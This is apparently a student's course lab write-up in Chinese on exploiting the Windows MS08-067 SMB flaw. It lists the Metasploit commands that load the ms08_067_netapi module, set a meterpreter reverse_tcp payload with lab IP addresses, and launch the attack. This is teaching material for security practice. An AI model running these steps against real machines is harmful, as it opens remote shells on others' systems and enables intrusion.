20169210 2016-2017-2《网络攻防实践》第十三周攻击MS08-067漏洞
利用MS08-067漏洞在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。
在Kali用命令 msfconsole 开启Metasploit (在终端里输入msfconsole
)
然后运行命令:
use exploit/windows/smb/ms08_067_netapi #使用MS08067漏洞攻击程序
set payload windows/meterpreter/reverse_tcp #设置payload
show options #查看设置信息
set LHOST 192.168.116.3 #设置本地主机IP
set RHOST 192.168.116.116 #设置目标主机IP
exploit #实施攻击
攻击成功如下图所示